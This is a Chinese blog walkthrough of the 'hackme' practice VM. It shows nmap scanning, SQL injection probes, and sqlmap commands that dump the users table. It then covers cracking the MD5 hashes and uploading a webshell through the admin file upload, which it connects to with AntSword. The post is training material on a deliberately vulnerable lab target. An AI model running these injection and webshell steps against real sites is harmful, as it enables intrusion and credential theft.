hackme靶场/靶机练习

最新推荐文章于 2024-08-09 09:21:14 发布
最新推荐文章于 2024-08-09 09:21:14 发布
阅读量204 收藏 3
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140769180
版权

信息搜集:

kali: 192.168.116.129

nmap扫描:

nmap -sP 192.168.116.0/24

靶机ip: 192.168.116.128

使用了御剑进行目录扫描:

kali扫描端口:

访问http80端口:

我们选择注册:

登录:

点击search

尝试sql注入:

Windows OS' and 1=1#

Windows OS' and 1=2#

这靶场怎么加载这么慢啊

Windows OS 这个有注入点 使用sqlmap:

将请求包复制->1.txt->在注入点添加一个 * 号

python sqlmap.py -r 1.txt --dbs --batch

得到库名:

查看表名:

python sqlmap.py -r 1.txt -D webapphacking --tables --batch

下载:

python sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch

得到md5加密的密码和账号

md5解密:

尝试登录管理员:

发现一个文件上传:

尝试上传木马:

上传的目录在 刚才目录扫描的时候 扫出来的 

http://192.168.116.128/uploads/

使用蚁剑连接:

成功!

雾魈
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1994
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
xss hack学习靶场 writeup
dianmangji9200的博客
08-12 639
靶场链接http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg 参考博客https://blog.csdn.net/xlsj228/article/details/93166486 1 可以看到url中的test参数出现在页面中,虽然f12看到了下一关的地址,我假装没看见 在url处构造payload:xss.tesla-space....
hackme-1靶机渗透详解
大熊
06-12 478
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
tomato/A1web 1.0/hackme/靶机复现漏洞详解
Jz031212的博客
08-05 765
首先虚拟机建一个hackme靶机切换nat模式 然后kali扫描自己全端口nmap -sV ip段 0/24扫描出ip进行访问发现是个登录页面可以注册先注册然后登录发现是搜索框,我们直接用搜索型的sql注入。
Hackme靶机渗透
m0_50584370的博客
06-01 234
hackme靶机渗透
Hackme-2靶机
zjxxxy的博客
06-12 126
Hackme-2靶场攻略
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 190
靶场通关 | hackme.ova靶机通关秘籍~
Hackme-1靶机
zjxxxy的博客
06-12 209
Hackme-1靶场攻略
HACKME:1靶机
JKding123的博客
10-22 938
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
cracer安全学院内部练习靶场
04-13
这是最新大佬分享出来的靶机下载地址,是最新的cracer大佬的靶机地址,解压密码在压缩包内打开即可看到解压密码。希望大家能够希望
vulhub漏洞测试靶场
08-16
靶场则是一系列靶机的集合,它为用户提供了一个真实的网络环境,可以在这里练习各种渗透测试技巧和漏洞利用方法。Vulhub作为这样的靶场,其目标是让安全专家和新手都能在一个可控的环境中了解和掌握漏洞利用。 2. *...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
靶机GoldenEye-V1练习报告1
08-08
靶机GoldenEye-V1练习报告1
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1433
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 913
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 532
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1133
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
网络安全先打dvwa靶场还是先打靶机
09-13
首先,感谢您对网络安全的关注。根据一般的实践,建议您先打靶机,然后再进行DVWA靶场的挑战。 打靶机是指通过攻击和渗透测试来评估和提高系统的安全性。靶机通常是专门搭建的实验环境,模拟了真实网络环境中可能存在的漏洞和脆弱点。通过对靶机进行攻击测试,您可以学习和理解网络攻击的原理和方法,并提高自己解决安全问题的能力。 而DVWA(Damn Vulnerable Web Application)是一个专门用于安全渗透测试和练习的Web应用程序。它包含了各种常见的Web漏洞,如SQL注入、跨站脚本攻击(XSS)等。通过挑战DVWA靶场,您可以实践和巩固已经学到的攻击技术,并且更加深入地理解这些漏洞的原理和危害。 因此,通过先打靶机再进行DVWA靶场的顺序,您可以先学习并掌握基础的渗透测试技术,然后再应用到更具挑战性的实战环境中。这样有助于您系统地提升网络安全知识和技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值